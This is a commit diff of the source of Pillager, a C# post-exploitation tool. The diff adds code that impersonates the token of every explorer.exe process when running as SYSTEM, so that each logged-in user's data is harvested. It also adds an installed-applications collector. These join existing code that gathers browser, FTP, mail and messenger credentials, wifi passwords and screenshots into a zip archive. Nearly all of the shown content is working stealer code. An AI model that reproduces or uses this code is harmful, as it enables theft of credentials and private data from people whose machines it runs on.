Compare commits

..

2 Commits

Author SHA1 Message Date
簞純 136ca40c63 update 2024-02-12 12:29:40 +08:00
簞純 ec6e84d537 update 2024-02-12 10:57:06 +08:00
9 changed files with 147 additions and 26 deletions

View File

@ -1,4 +1,6 @@
using System.IO;
using System;
using System.IO;
using System.Management;
namespace Pillager.Helper
{
@ -39,5 +41,41 @@ namespace Pillager.Helper
}
}
}
public static string GetProcessUserName(int pID)
{
string text1 = null;
SelectQuery query1 = new SelectQuery("Select * from Win32_Process WHERE processID=" + pID);
ManagementObjectSearcher searcher1 = new ManagementObjectSearcher(query1);
try
{
foreach (ManagementObject disk in searcher1.Get())
{
ManagementBaseObject inPar = null;
ManagementBaseObject outPar = null;
inPar = disk.GetMethodParameters("GetOwner");
outPar = disk.InvokeMethod("GetOwner", inPar, null);
text1 = outPar["User"].ToString();
break;
}
}
catch
{
text1 = "SYSTEM";
}
return text1;
}
public static bool ImpersonateProcessToken(int pid)
{
IntPtr hProcess = Native.OpenProcess(Native.PROCESS_ACCESS_FLAGS.PROCESS_QUERY_INFORMATION, true, pid);
if (hProcess == IntPtr.Zero) return false;
IntPtr hToken;
if (!Native.OpenProcessToken(hProcess, 0x00000002 | 0x00000004, out hToken)) return false;
IntPtr DuplicatedToken = new IntPtr();
if (!Native.DuplicateToken(hToken, 2, ref DuplicatedToken)) return false;
if (!Native.SetThreadToken(IntPtr.Zero, DuplicatedToken)) return false;
return true;
}
}
}

View File

@ -7,6 +7,15 @@ namespace Pillager.Helper
{
public static class Native
{
[DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool RevertToSelf();
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll")]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, ref IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken);
[DllImport("kernel32", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);

View File

@ -35,6 +35,7 @@
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Security" />
<Reference Include="System.Data" />
<Reference Include="System.Windows.Forms" />
@ -77,8 +78,9 @@
<Compile Include="Messengers\QQ.cs" />
<Compile Include="Messengers\Skype.cs" />
<Compile Include="Messengers\Telegram.cs" />
<Compile Include="Others\ScreenShot.cs" />
<Compile Include="Others\Wifi.cs" />
<Compile Include="SystemInfos\InstalledApp.cs" />
<Compile Include="SystemInfos\ScreenShot.cs" />
<Compile Include="SystemInfos\Wifi.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Helper\SQLiteHandler.cs" />

View File

@ -1,11 +1,13 @@
using System.IO;
using System;
using System.Diagnostics;
using System.IO;
using Pillager.Browsers;
using Pillager.FTPs;
using Pillager.Helper;
using Pillager.Mails;
using Pillager.Messengers;
using Pillager.Others;
using Pillager.Softwares;
using Pillager.SystemInfos;
using Pillager.Tools;
namespace Pillager
@ -20,16 +22,43 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
if (Environment.UserName.ToLower() == "system")
{
foreach (Process p in Process.GetProcesses())
{
if (p.ProcessName.ToLower() == "explorer" && Methods.ImpersonateProcessToken(p.Id))
{
string usersavepath = Path.Combine(savepath, Methods.GetProcessUserName(p.Id));
Directory.CreateDirectory(usersavepath);
SaveAll(usersavepath);
Native.RevertToSelf();
}
}
}
else
{
SaveAll(savepath);
}
//Zip
ZipStorer zip = ZipStorer.Create(savezippath);
foreach (var item in Directory.GetDirectories(savepath))
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
foreach (var item in Directory.GetFiles(savepath))
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
zip.Close();
Directory.Delete(savepath, true);
}
static void SaveAll(string savepath)
{
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
//Others
Wifi.Save(savepath);
ScreenShot.Save(savepath);
//FTP
WinSCP.Save(savepath);
FileZilla.Save(savepath);
@ -66,15 +95,10 @@ namespace Pillager
Line.Save(savepath);
Discord.Save(savepath);
//Zip
ZipStorer zip = ZipStorer.Create(savezippath);
foreach (var item in Directory.GetDirectories(savepath))
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
foreach (var item in Directory.GetFiles(savepath))
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
zip.Close();
Directory.Delete(savepath, true);
//SystemInfos
Wifi.Save(savepath);
ScreenShot.Save(savepath);
InstalledApp.Save(savepath);
}
}
}

View File

@ -0,0 +1,46 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
namespace Pillager.SystemInfos
{
internal class InstalledApp
{
public static string SystemInfoName = "InstalledApp";
public static string GetInfo()
{
StringBuilder sb = new StringBuilder();
try
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Uninstall"))
foreach (var subkey in key.GetSubKeyNames())
{
string value = key.OpenSubKey(subkey)?.GetValue("DisplayName", "Error").ToString();
if (!string.IsNullOrEmpty(value) && value != "Error" && !value.Contains("Windows"))
sb.AppendLine(value);
}
}
catch
{ }
return sb.ToString();
}
public static void Save(string path)
{
try
{
string savepath = Path.Combine(path, SystemInfoName);
string result = GetInfo();
if (!string.IsNullOrEmpty(result))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), result);
}
}
catch { }
}
}
}

View File

@ -4,17 +4,17 @@ using System.IO;
using System.Windows.Forms;
using Pillager.Helper;
namespace Pillager.Others
namespace Pillager.SystemInfos
{
internal class ScreenShot
{
public static string OtherName = "ScreenShot";
public static string SystemInfoName = "ScreenShot";
public static void Save(string path)
{
try
{
string savepath = Path.Combine(path, OtherName);
string savepath = Path.Combine(path, SystemInfoName);
try
{
Native.SetProcessDPIAware();
@ -32,7 +32,7 @@ namespace Pillager.Others
{
graphics.CopyFromScreen(screen.Bounds.Left, screen.Bounds.Top, 0, 0, new Size(bitmap.Width, bitmap.Height), CopyPixelOperation.SourceCopy);
}
bitmap.Save(Path.Combine(savepath, OtherName + i + ".jpg"), ImageFormat.Jpeg);
bitmap.Save(Path.Combine(savepath, SystemInfoName + i + ".jpg"), ImageFormat.Jpeg);
}
}
}

View File

@ -4,11 +4,11 @@ using System.Text;
using System.Xml;
using Pillager.Helper;
namespace Pillager.Others
namespace Pillager.SystemInfos
{
internal class Wifi
{
public static string OtherName = "Wifi";
public static string SystemInfoName = "Wifi";
private static string GetMessage()
{
const int dwClientVersion = 2;
@ -72,12 +72,12 @@ namespace Pillager.Others
{
try
{
string savepath = Path.Combine(path, OtherName);
string savepath = Path.Combine(path, SystemInfoName);
string wifi = GetMessage();
if (!string.IsNullOrEmpty(wifi))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, OtherName + ".txt"), wifi);
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), wifi);
}
}
catch { }

View File

@ -85,6 +85,7 @@ Will add more ......
* Wifi
* ScreenShot
* InstalledApp
## Usage

View File

@ -83,6 +83,7 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
* Wifi
* 截屏
* 已安装应用
## 使用方法